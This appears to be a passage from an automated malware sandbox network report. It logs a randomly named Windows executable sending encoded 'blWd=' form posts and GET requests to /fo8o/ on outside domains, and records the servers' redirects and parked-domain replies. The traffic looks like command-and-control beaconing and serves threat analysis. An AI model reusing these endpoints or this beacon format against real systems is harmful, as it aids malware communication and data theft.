            Data Raw: 62 6c 57 64 3d 72 7a 50 78 39 57 50 50 4e 34 6f 48 54 79 4b 34 47 37 72 64 4f 56 77 6d 61 71 32 63 61 71 55 77 61 2b 68 45 47 78 5a 33 42 77 65 75 48 4b 6c 6e 52 52 56 70 44 76 36 74 54 54 2f 54 71 67 46 4a 4a 69 37 34 63 36 4d 2b 65 5a 36 32 39 44 68 2f 50 53 39 4b 48 56 56 56 2b 4b 66 53 41 4b 51 56 54 70 7a 4c 5a 42 61 70 59 30 76 6a 45 36 5a 2b 35 53 6b 67 46 63 69 74 48 46 51 58 39 4d 57 5a 47 6d 6b 52 74 73 62 33 69 77 42 55 4e 4a 57 67 54 36 63 30 4c 68 76 4f 6c 75 69 68 74 4a 52 2b 6a 50 34 65 6c 4e 69 46 35 5a 72 6b 44 77 52 6e 56 51 50 51 46 68 4e 41 69 77 32 43 63 4b 4c 71 2b 34 36 6e 6d 41 48 51 37 45 2f 4c 4f 36 6f 41 59 6c 4c 6a 33 79 6c 39 71 4b 30 42 4e 36 37 55 32 67 3d 3d
            Data Ascii: blWd=rzPx9WPPN4oHTyK4G7rdOVwmaq2caqUwa+hEGxZ3BweuHKlnRRVpDv6tTT/TqgFJJi74c6M+eZ629Dh/PS9KHVVV+KfSAKQVTpzLZBapY0vjE6Z+5SkgFcitHFQX9MWZGmkRtsb3iwBUNJWgT6c0LhvOluihtJR+jP4elNiF5ZrkDwRnVQPQFhNAiw2CcKLq+46nmAHQ7E/LO6oAYlLj3yl9qK0BN67U2g==
            Aug 2, 2024 13:53:22.142978907 CEST | 1070 | IN | HTTP/1.1 301 Moved Permanently
            Connection: close
            content-type: text/html
            content-length: 795
            date: Fri, 02 Aug 2024 11:53:22 GMT
            server: LiteSpeed
            location: https://www.empowermedeco.com/fo8o/
            platform: hostinger
            content-security-policy: upgrade-insecure-requests
            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
            39 | 192.168.2.6 | 49769 | 217.196.55.202 | 80 | 5700 | C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe
            Timestamp | Bytes transferred | Direction | Data
            Aug 2, 2024 13:53:24.099364042 CEST | 1829 | OUT | POST /fo8o/ HTTP/1.1
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Language: en-US,en
            Accept-Encoding: gzip, deflate, br
            Host: www.empowermedeco.com
            Origin: http://www.empowermedeco.com
            Cache-Control: no-cache
            Connection: close
            Content-Type: application/x-www-form-urlencoded
            Content-Length: 1245
            Referer: http://www.empowermedeco.com/fo8o/
            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Data Raw: 62 6c 57 64 3d 72 7a 50 78 39 57 50 50 4e 34 6f 48 54 79 4b 34 47 37 72 64 4f 56 77 6d 61 71 32 63 61 71 55 77 61 2b 68 45 47 78 5a 33 42 77 6d 75 48 5a 74 6e 65 53 4e 70 43 76 36 74 64 7a 2f 53 71 67 46 51 4a 69 6a 43 63 36 51 41 65 63 2b 32 37 6b 68 2f 48 48 4a 4b 4a 56 56 56 78 71 66 58 4f 71 52 49 54 70 6a 50 5a 42 4b 70 59 30 76 6a 45 38 31 2b 77 6a 6b 67 44 63 69 75 50 6c 52 57 33 73 57 31 47 6d 73 42 74 73 4f 41 68 41 68 55 4f 70 6d 67 52 49 45 30 57 52 76 49 6b 75 69 70 74 4a 74 68 6a 50 6c 68 6c 4f 2b 6a 35 5a 66 6b 50 46 73 68 4a 77 48 57 61 48 4e 6e 79 33 44 6b 63 50 7a 63 2f 49 66 47 6e 42 37 32 7a 51 6a 57 4b 61 30 72 65 54 79 34 77 45 73 63 6b 71 41 54 48 37 75 4b 6c 42 6c 74 2b 35 54 38 46 65 47 6e 49 44 48 68 47 6a 4c 68 51 43 76 52 77 68 48 65 4d 74 49 51 4c 6f 31 75 6c 46 64 50 6d 2f 57 5a 6a 77 66 67 33 70 58 4c 71 4a 7a 4c 36 75 5a 6b 2f 68 53 68 4b 38 37 4a 2f 42 38 4e 6d 64 4e 76 45 72 53 51 6b 75 66 4c 38 68 42 41 36 7a 6a 45 68 79 49 36 76 47 75 55 67 48 32 73 38 31 58 65 56 [TRUNCATED]
            Data Ascii: blWd=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 [TRUNCATED]
            Aug 2, 2024 13:53:24.672560930 CEST | 1070 | IN | HTTP/1.1 301 Moved Permanently
            Connection: close
            content-type: text/html
            content-length: 795
            date: Fri, 02 Aug 2024 11:53:24 GMT
            server: LiteSpeed
            location: https://www.empowermedeco.com/fo8o/
            platform: hostinger
            content-security-policy: upgrade-insecure-requests
            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
            40 | 192.168.2.6 | 49770 | 217.196.55.202 | 80 | 5700 | C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe
            Timestamp | Bytes transferred | Direction | Data
            Aug 2, 2024 13:53:26.630445004 CEST | 528 | OUT | GET /fo8o/?blWd=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKYS1O+KnDGu0Ee7a9fQq7JRnHJ6pn6i4sEdb7G20jo8euDHkgubc=&Ixe=Apq4tPPXNdTp2 HTTP/1.1
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Language: en-US,en
            Host: www.empowermedeco.com
            Connection: close
            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Aug 2, 2024 13:53:27.259416103 CEST | 1230 | IN | HTTP/1.1 301 Moved Permanently
            Connection: close
            content-type: text/html
            content-length: 795
            date: Fri, 02 Aug 2024 11:53:27 GMT
            server: LiteSpeed
            location: https://www.empowermedeco.com/fo8o/?blWd=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKYS1O+KnDGu0Ee7a9fQq7JRnHJ6pn6i4sEdb7G20jo8euDHkgubc=&Ixe=Apq4tPPXNdTp2
            platform: hostinger
            content-security-policy: upgrade-insecure-requests
            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
            41 | 192.168.2.6 | 64509 | 199.59.243.226 | 80 | 5700 | C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe
            Timestamp | Bytes transferred | Direction | Data
            Aug 2, 2024 13:53:35.339806080 CEST | 771 | OUT | POST /fo8o/ HTTP/1.1
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Language: en-US,en
            Accept-Encoding: gzip, deflate, br
            Host: www.joyesi.xyz
            Origin: http://www.joyesi.xyz
            Cache-Control: no-cache
            Connection: close
            Content-Type: application/x-www-form-urlencoded
            Content-Length: 209
            Referer: http://www.joyesi.xyz/fo8o/
            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Data Raw: 62 6c 57 64 3d 31 68 42 4b 38 75 43 4f 6e 30 4f 36 45 57 36 79 7a 36 52 78 51 76 48 46 58 6a 46 4b 4e 55 49 66 68 37 2f 79 57 39 34 37 56 52 50 48 53 69 6e 73 73 69 62 2f 32 37 64 54 71 54 55 46 74 70 4d 36 76 53 76 45 4b 58 50 38 6d 75 7a 61 66 43 38 36 38 77 6c 53 72 36 62 49 6f 34 5a 69 36 77 4e 34 34 6b 67 39 6c 49 51 71 73 6e 71 65 71 6e 63 63 73 68 52 4c 42 78 38 69 5a 76 55 61 37 4f 5a 61 59 4a 42 36 31 53 72 35 63 76 46 37 46 45 4b 47 59 73 5a 51 56 44 38 48 6c 76 71 42 59 70 2b 69 48 56 4e 49 46 54 72 63 45 6d 6a 56 79 53 63 2f 58 76 39 66 55 57 30 68 64 42 67 50 43 49 32 7a 79 30 65 53 2b 7a 4e 30 44 55 70 42
            Data Ascii: blWd=1hBK8uCOn0O6EW6yz6RxQvHFXjFKNUIfh7/yW947VRPHSinssib/27dTqTUFtpM6vSvEKXP8muzafC868wlSr6bIo4Zi6wN44kg9lIQqsnqeqnccshRLBx8iZvUa7OZaYJB61Sr5cvF7FEKGYsZQVD8HlvqBYp+iHVNIFTrcEmjVySc/Xv9fUW0hdBgPCI2zy0eS+zN0DUpB
            Aug 2, 2024 13:53:35.868133068 CEST | 1236 | IN | HTTP/1.1 200 OK
            date: Fri, 02 Aug 2024 11:53:34 GMT
            content-type: text/html; charset=utf-8
            content-length: 1106
            x-request-id: f0818423-dd2c-443d-8e56-a14554145f15
            cache-control: no-store, max-age=0
            accept-ch: sec-ch-prefers-color-scheme
            critical-ch: sec-ch-prefers-color-scheme
            vary: sec-ch-prefers-color-scheme
            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_DZHRwTcUADzBToRJTchIEt0chq2qzwv0V3TyRgH29Q+y+YVt4zGGrecgiCD1fYmFiE/tVLQb0H25HUNUVgiYeA==
            set-cookie: parking_session=f0818423-dd2c-443d-8e56-a14554145f15; expires=Fri, 02 Aug 2024 12:08:35 GMT; path=/
            connection: close
            Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 44 5a 48 52 77 54 63 55 41 44 7a 42 54 6f 52 4a 54 63 68 49 45 74 30 63 68 71 32 71 7a 77 76 30 56 33 54 79 52 67 48 32 39 51 2b 79 2b 59 56 74 34 7a 47 47 72 65 63 67 69 43 44 31 66 59 6d 46 69 45 2f 74 56 4c 51 62 30 48 32 35 48 55 4e 55 56 67 69 59 65 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
            Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_DZHRwTcUADzBToRJTchIEt0chq2qzwv0V3TyRgH29Q+y+YVt4zGGrecgiCD1fYmFiE/tVLQb0H25HUNUVgiYeA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
            Aug 2, 2024 13:53:35.868191957 CEST | 559 | IN | Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
            Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZjA4MTg0MjMtZGQyYy00NDNkLThlNTYtYTE0NTU0MTQ1ZjE1IiwicGFnZV90aW1lIjoxNzIyNTk5Nj


            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
            42 | 192.168.2.6 | 64510 | 199.59.243.226 | 80 | 5700 | C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe
            Timestamp | Bytes transferred | Direction | Data
            Aug 2, 2024 13:53:37.881253004 CEST | 795 | OUT | POST /fo8o/ HTTP/1.1
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Language: en-US,en
            Accept-Encoding: gzip, deflate, br
            Host: www.joyesi.xyz
            Origin: http://www.joyesi.xyz
            Cache-Control: no-cache
            Connection: close
            Content-Type: application/x-www-form-urlencoded
            Content-Length: 233
            Referer: http://www.joyesi.xyz/fo8o/
            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Data Raw: 62 6c 57 64 3d 31 68 42 4b 38 75 43 4f 6e 30 4f 36 48 31 69 79 30 5a 4a 78 56 50 48 47 53 6a 46 4b 62 6b 49 54 68 37 37 79 57 38 4e 6d 56 45 58 48 54 41 2f 73 74 6a 62 2f 78 37 64 54 79 6a 55 45 67 4a 4d 7a 76 53 54 4d 4b 58 7a 38 6d 75 33 61 66 44 4d 36 38 6a 4e 52 71 71 62 4f 6a 59 5a 67 6e 41 4e 34 34 6b 67 39 6c 49 46 2f 73 6e 43 65 70 54 67 63 74 45 74 49 66 68 38 68 51 50 55 61 77 75 5a 65 59 4a 42 55 31 54 6e 54 63 70 4a 37 46 42 4f 47 59 39 5a 54 4d 7a 38 42 76 50 72 57 62 71 75 74 48 7a 59 6e 4b 79 72 37 66 55 54 74 36 45 64 6c 4c 63 39 38 47 47 55 6a 64 44 34 39 43 6f 32 5a 77 30 6d 53 73 6b 42 54 4d 67 4d 69 72 47 56 79 75 4e 65 50 47 70 78 34 38 63 7a 76 54 65 37 62 76 67 3d 3d
            Data Ascii: blWd=1hBK8uCOn0O6H1iy0ZJxVPHGSjFKbkITh77yW8NmVEXHTA/stjb/x7dTyjUEgJMzvSTMKXz8mu3afDM68jNRqqbOjYZgnAN44kg9lIF/snCepTgctEtIfh8hQPUawuZeYJBU1TnTcpJ7FBOGY9ZTMz8BvPrWbqutHzYnKyr7fUTt6EdlLc98GGUjdD49Co2Zw0mSskBTMgMirGVyuNePGpx48czvTe7bvg==
            Aug 2, 2024 13:53:38.363174915 CEST | 1236 | IN | HTTP/1.1 200 OK
            date: Fri, 02 Aug 2024 11:53:37 GMT
            content-type: text/html; charset=utf-8
            content-length: 1106
            x-request-id: aa032d9c-4cae-49a1-8aa5-edea1cc5aeb7
            cache-control: no-store, max-age=0
            accept-ch: sec-ch-prefers-color-scheme
            critical-ch: sec-ch-prefers-color-scheme
            vary: sec-ch-prefers-color-scheme
            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_DZHRwTcUADzBToRJTchIEt0chq2qzwv0V3TyRgH29Q+y+YVt4zGGrecgiCD1fYmFiE/tVLQb0H25HUNUVgiYeA==
            set-cookie: parking_session=aa032d9c-4cae-49a1-8aa5-edea1cc5aeb7; expires=Fri, 02 Aug 2024 12:08:38 GMT; path=/
            connection: close
            Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 44 5a 48 52 77 54 63 55 41 44 7a 42 54 6f 52 4a 54 63 68 49 45 74 30 63 68 71 32 71 7a 77 76 30 56 33 54 79 52 67 48 32 39 51 2b 79 2b 59 56 74 34 7a 47 47 72 65 63 67 69 43 44 31 66 59 6d 46 69 45 2f 74 56 4c 51 62 30 48 32 35 48 55 4e 55 56 67 69 59 65 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
            Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_DZHRwTcUADzBToRJTchIEt0chq2qzwv0V3TyRgH29Q+y+YVt4zGGrecgiCD1fYmFiE/tVLQb0H25HUNUVgiYeA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
            Aug 2, 2024 13:53:38.363200903 CEST | 559 | IN | Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
            Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYWEwMzJkOWMtNGNhZS00OWExLThhYTUtZWRlYTFjYzVhZWI3IiwicGFnZV90aW1lIjoxNzIyNTk5Nj


            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
            43 | 192.168.2.6 | 64511 | 199.59.243.226 | 80 | 5700 | C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe
            Timestamp | Bytes transferred | Direction | Data
            Aug 2, 2024 13:53:40.427459955 CEST | 1808 | OUT | POST /fo8o/ HTTP/1.1
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Language: en-US,en
            Accept-Encoding: gzip, deflate, br
            Host: www.joyesi.xyz
            Origin: http://www.joyesi.xyz
            Cache-Control: no-cache
            Connection: close
            Content-Type: application/x-www-form-urlencoded
            Content-Length: 1245
            Referer: http://www.joyesi.xyz/fo8o/
            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Data Raw: 62 6c 57 64 3d 31 68 42 4b 38 75 43 4f 6e 30 4f 36 48 31 69 79 30 5a 4a 78 56 50 48 47 53 6a 46 4b 62 6b 49 54 68 37 37 79 57 38 4e 6d 56 45 66 48 53 31 72 73 73 45 76 2f 77 37 64 54 73 54 55 42 67 4a 4e 6a 76 57 48 49 4b 58 2f 4b 6d 6f 72 61 51 42 45 36 70 69 4e 52 6b 71 62 4f 73 34 5a 68 36 77 4e 58 34 6b 77 35 6c 49 56 2f 73 6e 43 65 70 56 45 63 74 52 52 49 64 68 38 69 5a 76 55 4f 37 4f 5a 6d 59 4a 5a 69 31 54 7a 70 63 5a 70 37 46 68 65 47 65 50 68 54 54 44 38 44 73 50 72 65 62 71 6a 74 48 33 34 52 4b 79 66 46 66 55 33 74 73 69 73 34 55 64 78 39 45 30 4d 78 44 67 63 72 50 50 71 31 32 45 71 31 6c 6c 78 4d 4e 6a 4d 35 6f 7a 52 4c 36 63 7a 45 49 6f 41 59 31 5a 65 62 53 4d 57 63 33 33 4a 4f 4d 53 70 64 6f 34 6b 6c 79 6f 4c 71 6c 36 56 4d 64 6b 4f 35 61 51 79 64 2b 57 36 65 66 76 49 31 54 74 59 4b 68 52 38 34 5a 75 66 56 47 67 6c 32 6e 43 62 4c 76 50 5a 6a 35 78 58 55 6a 4c 6b 44 43 6f 6e 41 42 52 2f 35 64 41 38 61 63 50 61 68 71 6d 6c 61 2f 64 6e 66 54 37 66 54 75 35 30 45 4e 55 41 49 77 62 51 4f 44 [TRUNCATED]
            Data Ascii: blWd=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 [TRUNCATED]
            Aug 2, 2024 13:53:40.922607899 CEST | 1236 | IN | HTTP/1.1 200 OK
            date: Fri, 02 Aug 2024 11:53:40 GMT
            content-type: text/html; charset=utf-8
            content-length: 1106
            x-request-id: 24f1eaba-a35b-4805-838d-dd7ad5787939
            cache-control: no-store, max-age=0
            accept-ch: sec-ch-prefers-color-scheme
